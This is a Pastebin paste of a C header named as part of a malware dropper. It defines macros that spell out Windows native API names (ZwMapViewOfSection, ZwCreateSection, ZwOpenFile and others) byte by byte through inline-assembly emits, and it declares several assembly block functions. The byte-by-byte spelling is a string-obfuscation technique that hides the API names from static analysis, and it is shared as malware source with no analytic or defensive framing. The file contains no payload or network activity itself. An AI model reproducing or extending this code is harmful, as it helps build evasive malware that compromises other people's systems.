Advertisement
FlyFar

dropper_AssemblyBlock1.h

Feb 19th, 2023
502
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.66 KB | Cybersecurity | 0 0
  1. #ifndef __ASSEMBLY_BLOCK1_H__
  2. #define __ASSEMBLY_BLOCK1_H__
  3.  
  4. #define ASM_EMIT __asm _emit
  5.  
  6. #define ASM_ZwMapViewOfSection \
  7.     ASM_EMIT 'Z' ASM_EMIT 'w' ASM_EMIT 'M' ASM_EMIT 'a' ASM_EMIT 'p' ASM_EMIT 'V' ASM_EMIT 'i' ASM_EMIT 'e' ASM_EMIT 'w'  ASM_EMIT 'O' ASM_EMIT 'f' ASM_EMIT 'S' ASM_EMIT 'e' ASM_EMIT 'c' ASM_EMIT 't' ASM_EMIT 'i' ASM_EMIT 'o' ASM_EMIT 'n' ASM_EMIT '\0'
  8.  
  9. #define ASM_ZwCreateSection \
  10.     ASM_EMIT 'Z' ASM_EMIT 'w' ASM_EMIT 'C' ASM_EMIT 'r' ASM_EMIT 'e' ASM_EMIT 'a' ASM_EMIT 't' ASM_EMIT 'e' ASM_EMIT 'S' ASM_EMIT 'e' ASM_EMIT 'c' ASM_EMIT 't' ASM_EMIT 'i' ASM_EMIT 'o' ASM_EMIT 'n' ASM_EMIT '\0'
  11.  
  12. #define ASM_ZwOpenFile \
  13.     ASM_EMIT 'Z' ASM_EMIT 'w' ASM_EMIT 'O' ASM_EMIT 'p' ASM_EMIT 'e' ASM_EMIT 'n' ASM_EMIT 'F' ASM_EMIT 'i' ASM_EMIT 'l' ASM_EMIT 'e' ASM_EMIT '\0'
  14.  
  15. #define ASM_ZwClose \
  16.     ASM_EMIT 'Z' ASM_EMIT 'w' ASM_EMIT 'C' ASM_EMIT 'l' ASM_EMIT 'o' ASM_EMIT 's' ASM_EMIT 'e' ASM_EMIT '\0'
  17.  
  18. #define ASM_ZwQueryAttributesFile \
  19.     ASM_EMIT 'Z' ASM_EMIT 'w' ASM_EMIT 'Q' ASM_EMIT 'u' ASM_EMIT 'e' ASM_EMIT 'r' ASM_EMIT 'y' ASM_EMIT 'A' ASM_EMIT 't'  ASM_EMIT 't' ASM_EMIT 'r' ASM_EMIT 'i' ASM_EMIT 'b' ASM_EMIT 'u' ASM_EMIT 't' ASM_EMIT 'e' ASM_EMIT 's' ASM_EMIT 'F' ASM_EMIT 'i' ASM_EMIT 'l' ASM_EMIT 'e' ASM_EMIT '\0'
  20.  
  21. #define ASM_ZwQuerySection \
  22.     ASM_EMIT 'Z' ASM_EMIT 'w' ASM_EMIT 'Q' ASM_EMIT 'u' ASM_EMIT 'e' ASM_EMIT 'r' ASM_EMIT 'y' ASM_EMIT 'S' ASM_EMIT 'e' ASM_EMIT 'c' ASM_EMIT 't' ASM_EMIT 'i' ASM_EMIT 'o' ASM_EMIT 'n' ASM_EMIT '\0'
  23.  
  24. void __ASM_BLOCK1_0(void);
  25. void __ASM_BLOCK1_1(void);
  26. void __ASM_BLOCK1_2(void);
  27. void __ASM_BLOCK1_3(void);
  28. void __ASM_BLOCK1_4(void);
  29. void __ASM_BLOCK1_5(void);
  30. void __ASM_BLOCK1_6(void);
  31.  
  32. #endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement